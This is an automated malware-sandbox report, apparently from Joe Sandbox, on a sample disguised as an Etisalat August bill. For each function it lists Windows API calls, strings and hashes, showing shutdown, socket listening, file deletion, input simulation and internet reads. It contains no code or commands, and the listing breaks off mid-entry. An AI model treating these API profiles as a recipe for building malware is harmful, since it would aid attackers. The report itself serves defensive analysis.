Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 54a6f705b0d54168c6a5834bf0d1faf6a18e1551364d40972aad525e3790872f
Instruction ID: 8f448ded11481d57b0e29eae1bc384d3a43bb61bceda27c03c9dba17d6a86df0
Opcode Fuzzy Hash: 54a6f705b0d54168c6a5834bf0d1faf6a18e1551364d40972aad525e3790872f
Instruction Fuzzy Hash: D241E3752086119FE310CF19E849F59BBE5FF44318F14C099E8199B6A2C775EC81CF90

Function 0090E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 009016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0090170D
Part of subcall function 009016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0090173A
Part of subcall function 009016C3: GetLastError.KERNEL32 ref: 0090174A

ExitWindowsEx.USER32(?,00000000), ref: 0090E932

Strings

, xrefs: 0090E95C
, xrefs: 0090E920
SeShutdownPrivilege, xrefs: 0090E902
@, xrefs: 0090E925

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 3e0add9a7f7d4986e3168d0f7f4ff4605611074b459ef2d6aa8ec02704962be7
Instruction ID: a7930eea2038c95125e3c9dde3df459c0cb409bcf828ffb0774d2e8db217929d
Opcode Fuzzy Hash: 3e0add9a7f7d4986e3168d0f7f4ff4605611074b459ef2d6aa8ec02704962be7
Instruction Fuzzy Hash: B701F973624311AFEB5426B49C86FBF726CA714B90F154D21FC23F21D1D5A55C409690

Function 00921204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00921276
WSAGetLastError.WSOCK32 ref: 00921283
bind.WSOCK32(00000000,?,00000010), ref: 009212BA
WSAGetLastError.WSOCK32 ref: 009212C5
closesocket.WSOCK32(00000000), ref: 009212F4
listen.WSOCK32(00000000,00000005), ref: 00921303
WSAGetLastError.WSOCK32 ref: 0092130D
closesocket.WSOCK32(00000000), ref: 0092133C

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 1981f26fc2272f1d824215519ce6cd51926e5beea025552aec0860f8bbd6cda2
Instruction ID: a5eb607accf503e1199a1e8afbd978c15ce9d9e9995367eb791b6f6cb558b904
Opcode Fuzzy Hash: 1981f26fc2272f1d824215519ce6cd51926e5beea025552aec0860f8bbd6cda2
Instruction Fuzzy Hash: 75418171A00110DFD710DF68D488B2ABBE6FF56318F188198E8569F296C771ED85CBE1

Function 008DB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008DB9D4
_free.LIBCMT ref: 008DB9F8
_free.LIBCMT ref: 008DBB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00943700), ref: 008DBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0097121C,000000FF,00000000,0000003F,00000000,?,?), ref: 008DBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00971270,000000FF,?,0000003F,00000000,?), ref: 008DBC36
_free.LIBCMT ref: 008DBD4B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 1bb5e60a092f5f633aca7d0c7a5b8d93078014b4ca7c5302d7e976da1b45a09b
Instruction ID: 9266bf672a8b3728159dc4f857ee259e69cc88b2593386f9fbb0928efa3cd914
Opcode Fuzzy Hash: 1bb5e60a092f5f633aca7d0c7a5b8d93078014b4ca7c5302d7e976da1b45a09b
Instruction Fuzzy Hash: A5C11671904248EFCB249F6D8851BAA7BF9FF41360F1543ABE494D7352EB308E419751

Function 0090D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008A3A97,?,?,008A2E7F,?,?,?,00000000), ref: 008A3AC2

Part of subcall function 0090E199: GetFileAttributesW.KERNEL32(?,0090CF95), ref: 0090E19A

FindFirstFileW.KERNEL32(?,?), ref: 0090D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0090D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0090D481
FindClose.KERNEL32(00000000), ref: 0090D498
FindClose.KERNEL32(00000000), ref: 0090D4A1

Strings

\*.*, xrefs: 0090D3F2

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: dc52cae61c5833ad0cc2199ce30f9f0cd923bfe20010300d8d3519011ccfeed6
Instruction ID: 4e71d5906c0f4fe2125761b1a317d7dc48a8ed9d699239a3dda44484d1b4197b
Opcode Fuzzy Hash: dc52cae61c5833ad0cc2199ce30f9f0cd923bfe20010300d8d3519011ccfeed6
Instruction Fuzzy Hash: 36316D7101D3519FD204EF68D8918AFB7A8FE92304F444A2DF4E1931E1EB24EA09DB63

Function 008DE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 008DE645

Strings

1#INF, xrefs: 008DF852
1#IND, xrefs: 008DF83D
1#SNAN, xrefs: 008DF844
1#QNAN, xrefs: 008DF84B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 62d486e25aa7d899df57a54d5f2b33d9ef8442c5570b2342f44a0dd83e1cc262
Instruction ID: 10153d4537ce21044981def57e5ab1adb4371220b2c5dc3f17706f2035c24ef9
Opcode Fuzzy Hash: 62d486e25aa7d899df57a54d5f2b33d9ef8442c5570b2342f44a0dd83e1cc262
Instruction Fuzzy Hash: 6FC23771E086288BDB25DE289D407EAB7B5FB48314F1442EBD94EE7341E774AE819F40

Function 0091648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009164DC
CoInitialize.OLE32(00000000), ref: 00916639
CoCreateInstance.OLE32(0093FCF8,00000000,00000001,0093FB68,?), ref: 00916650
CoUninitialize.OLE32 ref: 009168D4

Strings

.lnk, xrefs: 009164BA, 00916524, 009165E0

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: c33b0a7fbca94ca86d7bd0012423bc55c18164fd7205c2413eabca83738633d8
Instruction ID: 9cd170edc23716b3f499e2bf68dc8e6e35eaf6616db2d02d9d9496d64f73057f
Opcode Fuzzy Hash: c33b0a7fbca94ca86d7bd0012423bc55c18164fd7205c2413eabca83738633d8
Instruction Fuzzy Hash: 2AD14971608205AFD304EF28C881EABB7E9FF95704F00496DF595CB2A1EB70E945CB92

Function 009222DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 009222E8

Part of subcall function 0091E4EC: GetWindowRect.USER32(?,?), ref: 0091E504

GetDesktopWindow.USER32 ref: 00922312
GetWindowRect.USER32(00000000), ref: 00922319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00922355
GetCursorPos.USER32(?), ref: 00922381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009223DF

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 96368c75c47401da8f076fbb130bb1ff8980d62544bb03934b130e8dc38ff448
Instruction ID: 66d3289851431a5326dc7db64abd6f5d1d8270c509c22d7a0b7160769b8c12ba
Opcode Fuzzy Hash: 96368c75c47401da8f076fbb130bb1ff8980d62544bb03934b130e8dc38ff448
Instruction Fuzzy Hash: 4031E072508715AFD720DF14D849B9BBBA9FFC8714F000A19F985A7191DB34EA08CB92

Function 00919B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00919B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00919C8B

Part of subcall function 00913874: GetInputState.USER32 ref: 009138CB
Part of subcall function 00913874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00913966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00919BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00919C75

Strings

*.*, xrefs: 00919B5D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 66b5248e4ae7c81e755494bfcf101ddfffc63e070aa2cef0eaba6ff22eb802d1
Instruction ID: ec2365143bc92a5f8a6932a06e020f35a5de3df897284f6084778694a296f021
Opcode Fuzzy Hash: 66b5248e4ae7c81e755494bfcf101ddfffc63e070aa2cef0eaba6ff22eb802d1
Instruction Fuzzy Hash: 38417171A4460E9FDF14DF68C855AEEBBB8FF05310F144055F849A2291EB309E84CFA1

Function 008B997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 008B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008B9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 008B9A4E
GetSysColor.USER32(0000000F), ref: 008B9B23
SetBkColor.GDI32(?,00000000), ref: 008B9B36

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: e7cce9a6a40e1824c6f0f776d221af069ea214a043b824f246708e175cc52f4b
Instruction ID: 0f47dc5a295d113bef0108f786008e8eda4cd101bc3f0320edb1fb143993689b
Opcode Fuzzy Hash: e7cce9a6a40e1824c6f0f776d221af069ea214a043b824f246708e175cc52f4b
Instruction Fuzzy Hash: 2EA1247121842CAEF738AA3C8C89EFB3A9DFB82314F154109F782D67D1CA259D41D676

Function 00921806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0092304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0092307A
Part of subcall function 0092304E: _wcslen.LIBCMT ref: 0092309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0092185D
WSAGetLastError.WSOCK32 ref: 00921884
bind.WSOCK32(00000000,?,00000010), ref: 009218DB
WSAGetLastError.WSOCK32 ref: 009218E6
closesocket.WSOCK32(00000000), ref: 00921915

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 9d24cee37af038661447089df30d0c1e27a78a0ab7c10534bc0e89dca98bdd77
Instruction ID: 74881bfea22350463a66a18ee35bf4f14c0641c4aa731acb2452bdf34bd73351
Opcode Fuzzy Hash: 9d24cee37af038661447089df30d0c1e27a78a0ab7c10534bc0e89dca98bdd77
Instruction Fuzzy Hash: C251D675A00210AFEB10AF28D886F6A77E5EB45718F088458F905AF3C7D771ED41CBA2

Function 00931C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00931CC0
IsWindowEnabled.USER32 ref: 00931CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00931CDB
IsIconic.USER32 ref: 00931CE9
IsZoomed.USER32 ref: 00931CF7

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 8b3be51bb7ddd8f7eb29cfe8bf74aa226d0b6e7e17df40ee4a521d9822fe859b
Instruction ID: 6933a362f7d66a7d23252a4629473d0e9036131fc9e90327140f5f4f33983998
Opcode Fuzzy Hash: 8b3be51bb7ddd8f7eb29cfe8bf74aa226d0b6e7e17df40ee4a521d9822fe859b
Instruction Fuzzy Hash: 6B21C7717446115FD7208F2AC854B6A7BE9FF85315F199068E88ADB361CB71EC42CF90

Function 008A8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 008A83E8
VUUU, xrefs: 008A83FA
VUUU, xrefs: 008A843C
VUUU, xrefs: 008E5DF0
ERCP, xrefs: 008A813C

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 3ec57733b919c63bc93c0b517f7b74deaee4fa810dd7df6427592349b6c28336
Instruction ID: 60563b43b7ba6a6cc6062761c1c864b39b37765dddda4afb37fe19ada32f51ef
Opcode Fuzzy Hash: 3ec57733b919c63bc93c0b517f7b74deaee4fa810dd7df6427592349b6c28336
Instruction Fuzzy Hash: 47A29E70E0065ACBEF24CF59C8447ADB7B1FF56318F2481A9D815E7684EB709D91CB60

Function 0092A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0092A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0092A6BA

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0092A79C
CloseHandle.KERNEL32(00000000), ref: 0092A7AB

Part of subcall function 008BCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,008E3303,?), ref: 008BCE8A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: e21aedd3f3538d4ea212a1c31edb75c233708471b51e07f6a219663e73207fac
Instruction ID: eb2b1bb9b189d8ec863867f8a4aa74153200910488d541dc9474718510f73eb7
Opcode Fuzzy Hash: e21aedd3f3538d4ea212a1c31edb75c233708471b51e07f6a219663e73207fac
Instruction Fuzzy Hash: 2C512CB15083109FD710EF28D886A6BBBE8FF89754F04892DF595D7251EB70E904CB92

Function 0090AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0090AAAC
SetKeyboardState.USER32(00000080), ref: 0090AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0090AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0090AB88

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 30f645b21e6603e6c21f599c1707b184590eda8bec6ee7e5446b66ceb93b9caa
Instruction ID: af8a004f46c46a3033c238185382d1fddd35379ce567b1d4d5ce98cfdb8afd7f
Opcode Fuzzy Hash: 30f645b21e6603e6c21f599c1707b184590eda8bec6ee7e5446b66ceb93b9caa
Instruction Fuzzy Hash: 88311471A40718AEFB358B69CC05BFA7BAEAB94320F04421AF085961D1D378C981D7E2

Function 0091CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0091CE89
GetLastError.KERNEL32(?,00000000), ref: 0091CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0091CEFE

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 14039d82e6455f29977382c3910a6396beaefe04b1bff90c43aa0e69f368c043
Instruction ID: 052e82c570d66a601e7f9592d7af79bdd25249283569ae822560670e4e2e193d
Opcode Fuzzy Hash: 14039d82e6455f29977382c3910a6396beaefe04b1bff90c43aa0e69f368c043
Instruction Fuzzy Hash: EE21EDF1640709ABDB20CFA5C948BA7B7FCEB00314F10481EE542E2251E734EE858F90

Function 00908298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 009082AA

Strings

|, xrefs: 009082DA
(, xrefs: 009082F0

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 69d2a2af6c4885b78acbdd151ffa96d064594e7e4b55cff1e12b51072b166178
Instruction ID: eaa05d7590441a267301869acc77025223dc5c3417f37f2fc61e6b763515753b
Opcode Fuzzy Hash: 69d2a2af6c4885b78acbdd151ffa96d064594e7e4b55cff1e12b51072b166178
Instruction Fuzzy Hash: D6322475A007059FCB28CF69C481A6AB7F1FF48710B15C56EE59ADB3A1EB70E981CB40

Function 00915C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

